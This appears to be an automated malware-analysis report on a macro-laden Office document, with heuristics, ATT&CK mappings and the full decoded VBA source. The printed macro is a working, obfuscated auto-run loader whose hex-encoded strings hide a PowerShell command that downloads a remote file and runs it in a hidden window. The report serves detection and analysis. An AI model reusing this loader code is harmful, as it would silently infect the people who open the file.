MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample contains heavily obfuscated VBA macros, including auto-executing Document_Open and Workbook_Open routines. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates a loader designed to execute code via 'CreateObject/Shell/exec'. The 'GetObject' and 'CallByName' calls are used in conjunction with obfuscated strings to likely construct and execute a malicious payload, suggesting a downloader functionality.
Heuristics 10
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18) Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18)) Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18)) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18) Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18)) Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub Document_Open() CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() Document_Open -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _ Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _ Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18) -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4071 bytes |
SHA-256: dc471cabd54a845da9052c58ca5f64a594136a47c65a26910544488e16407521 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub Document_Open()
CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Sub bZsQcEDQrdCtdkrr()
Dim jSJWJoioisCWMvvKZZYnsRhPTdIGO As String
jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _
Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _
Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18)
Dim tdFXHjZBrKkCTmaUFHgIektdGsKU As String
Dim PyyNGYVivNqIlvHhGikEEBBV As Integer
tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
Dim fSiKBrpyeyLeIcHnC: Set fSiKBrpyeyLeIcHnC = CallByName(qPOmLxHndQYVOYya, CallByName(Me, "AJaqaMBlpXie", VbMethod, "65827389805B8085867380757771", 18), VbMethod)
fSiKBrpyeyLeIcHnC.ShowWindow = 0
Dim QTTXHDgZPtPgeiFbttQ: Set QTTXHDgZPtPgeiFbttQ = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F88444C697B8045447162848175778585", 18))
CallByName QTTXHDgZPtPgeiFbttQ, CallByName(Me, "AJaqaMBlpXie", VbMethod, "558477738677", 18), VbMethod, jSJWJoioisCWMvvKZZYnsRhPTdIGO, Null, fSiKBrpyeyLeIcHnC, PyyNGYVivNqIlvHhGikEEBBV
End Sub
Public Function AJaqaMBlpXie(ByVal QTTXHDgZPtPgeiFbttQ As String, ByVal PyyNGYVivNqIlvHhGikEEBBV As Long) As String
QTTXHDgZPtPgeiFbttQ = oEqwKBCToGBIXaUgUUyg(QTTXHDgZPtPgeiFbttQ)
Dim i As Long
AJaqaMBlpXie = Space$(Len(QTTXHDgZPtPgeiFbttQ))
For i = 1& To Len(QTTXHDgZPtPgeiFbttQ)
Mid$(AJaqaMBlpXie, i) = Chr$(Asc(Mid$(QTTXHDgZPtPgeiFbttQ, i, 1&)) - PyyNGYVivNqIlvHhGikEEBBV)
Next
End Function
Private Function oEqwKBCToGBIXaUgUUyg(ByVal zVNooMbfnEmbGtgGFQ As String) As String
Dim ZudxpXcEsCgjPwSPnTkQh As Integer
Dim PAtMkYpKKhUxNiwyxrlhJCgvxFO As Integer
Dim TMvaAfFCdDMdpHSYosI As String
If Len(zVNooMbfnEmbGtgGFQ) = 0 Or Len(zVNooMbfnEmbGtgGFQ) Mod 2 <> 0 Then Exit Function
ZudxpXcEsCgjPwSPnTkQh = Len(zVNooMbfnEmbGtgGFQ)
For PAtMkYpKKhUxNiwyxrlhJCgvxFO = 1 To Len(zVNooMbfnEmbGtgGFQ)
If PAtMkYpKKhUxNiwyxrlhJCgvxFO Mod 2 <> 0 Then
TMvaAfFCdDMdpHSYosI = TMvaAfFCdDMdpHSYosI & Chr$(Val("&H" & Mid$(zVNooMbfnEmbGtgGFQ, PAtMkYpKKhUxNiwyxrlhJCgvxFO, 2)))
End If
Next
oEqwKBCToGBIXaUgUUyg = TMvaAfFCdDMdpHSYosI
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.